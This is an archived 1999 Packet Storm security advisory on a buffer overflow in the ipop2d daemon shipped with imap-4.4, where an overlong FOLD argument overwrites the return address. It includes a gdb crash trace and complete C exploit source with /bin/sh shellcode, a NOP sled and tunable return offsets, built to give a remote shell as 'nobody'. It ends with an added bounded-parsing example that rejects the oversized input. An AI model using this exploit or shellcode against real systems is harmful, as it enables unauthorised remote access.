ipop2d.txt

Reported: 17 Aug 1999, by bind
Type: packetstorm
Source: packetstormsecurity.com

Vulnerability in POP2 allows remote users to obtain a shell as user "nobody"; impacts Linux systems.


Code

Vulnerable Program: POP2 shipped with imap-4.4 package
Platforms: Linux
Impact: Remote users can spawn a shell with uid of user "nobody"
Reported Initially: Chris Evans
Exploit Code: bind <[email protected]>


Details:
--------
POP-2 supports an anonymous proxy service where remote users can connect to
remote imap servers and login with a valid l/p. After authenticating with
the imap server, the command "FOLD" with a buffer of 1002 will completely
overwrite eip. Due to the fact that ipop2 sets the uid to nobody's you
cannot spawn a rootshell :(
  
```text
.
.
(gdb) run
+ POP2 localhost v4.46 server ready
HELO localhost:b4h p4ssw0rd
#0 messages in {localhost:143/imap/user=bind}INBOX
FOLD AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAA......................... (1002 'A's)

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

(gdb) info all-registers
.
.
esp 0xbffff5ec 0xbffff5ec
ebp 0x41414141 0x41414141
esi 0xbffff605 -1073744379
edi 0x80865ca 134768074
eip 0x41414141 0x41414141
.
.
```
  
Exploit Code:
-------------

Pipe output to netcat...

```c
/*
 * subipop2d.c (c) 1999 Subterrain Security
 *
 * Written by bind - June 18, 1999
 *
 * Vulnerable: ipop2 daemons shipped with the imap-4.4 package
 * Compromise: remote users can spawn a shell as user "nobody"
 *
 * Greets: vacuum, xdr & cripto...
 *
 * Usage:
 * ./subipop2 <auth> <user> <pass> [offset] [alignment] [wait]
 *
 * Try offsets -500...500, alignment option should be between 0 and 4
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* sleep() */

#define RET 0xbffff718
#define NOP 0x90
#define WAIT 20

char shellcode[] = /* shellcode borrowed from plaguez's imapx.c */
"\xeb\x38\x5e\x89\xf3\x89\xd8\x80\x46\x01\x20\x80\x46\x02\x20\x80"
"\x46\x03\x20\x80\x46\x05\x20\x80\x46\x06\x20\x89\xf7\x83\xc7\x07"
"\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc3\xff\xff\xff\x2f"
"\x42\x49\x4e\x2f\x53\x48\x00";

int main (int argc, char **argv)
{
    char buf[1002], *auth, *user, *pass;
    int i, offset = 0, align = 0, timeout = WAIT;
    unsigned long addr;

    if (argc < 4)
    {
        printf ("usage: %s <auth> <user> <password> [offset] [alignment]"
                " [wait]\n",
                argv[0]);
        exit (1);
    }

    auth = argv[1];
    user = argv[2];
    pass = argv[3];

    if (argc > 4) offset = atoi (argv[4]);
    if (argc > 5) align = atoi (argv[5]);
    if (argc > 6) timeout = atoi (argv[6]);

    addr = RET - offset;

    memset (buf, NOP, 1002);
    memcpy (buf + 500, shellcode, strlen (shellcode));

    for (i = (strlen (shellcode) + (600 + align)); i <= 1002; i += 4)
        *(long *) &buf[i] = addr;

    sleep (2);
    printf ("HELO %s:%s %s\n", auth, user, pass);
    sleep (timeout);
    printf ("FOLD %s\n", buf);

}
```
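The Details section above describes the defect from the attacker's side: a FOLD argument of 1002 bytes lands in a fixed stack buffer and overwrites the saved return address. As an added example that is not ipop2d's code nor the advisory author's, the block below shows the bounded parse a POP2 command handler should perform instead: the argument length is checked against a limit and the destination size before any byte is copied, so the advisory's 1002-byte line is rejected rather than written. The MAX_FOLDER limit, the function names and the sample inputs are assumptions constructed for this example.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>
/* Longest mailbox name accepted. Illustrative limit for this example, not
 * ipop2d's own constant; the advisory's 1002-byte argument must fail it. */
#define MAX_FOLDER 255
enum fold_result { FOLD_NOT_FOLD = -1, FOLD_EMPTY = -2, FOLD_TOO_LONG = -3 };

/* Parse a POP2 "FOLD <mailbox>" line into out (capacity outlen). The length is
 * checked before any byte is copied and out is always NUL-terminated.
 * Returns the mailbox length, or a negative fold_result. */
int parse_fold(const char *line, char *out, size_t outlen)
{
    const char *arg;
    size_t len;
    if (strncmp(line, "FOLD ", 5) != 0)
        return FOLD_NOT_FOLD;
    arg = line + 5;
    while (*arg == ' ') arg++;
    len = strcspn(arg, "\r\n");           /* argument ends at CRLF */
    if (len == 0)
        return FOLD_EMPTY;
    if (len > MAX_FOLDER || len >= outlen)
        return FOLD_TOO_LONG;             /* reject, never copy or truncate */
    memcpy(out, arg, len);
    out[len] = '\0';
    return (int)len;
}

/* Constructed input: the advisory's FOLD line with 1002 'A's. */
int demo_oversized_fold(void)
{
    char line[5 + 1002 + 3], out[MAX_FOLDER + 1];
    memcpy(line, "FOLD ", 5);
    memset(line + 5, 'A', 1002);
    memcpy(line + 5 + 1002, "\r\n", 3);   /* copies the trailing NUL too */
    return parse_fold(line, out, sizeof out);
}

/* Constructed input: an ordinary mailbox selection. */
int demo_normal_fold(void)
{
    char out[MAX_FOLDER + 1];
    return parse_fold("FOLD INBOX\r\n", out, sizeof out);
}

int main(void)
{
    printf("1002 'A's -> %d, INBOX -> %d\n", demo_oversized_fold(), demo_normal_fold());
    return 0;
}
```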
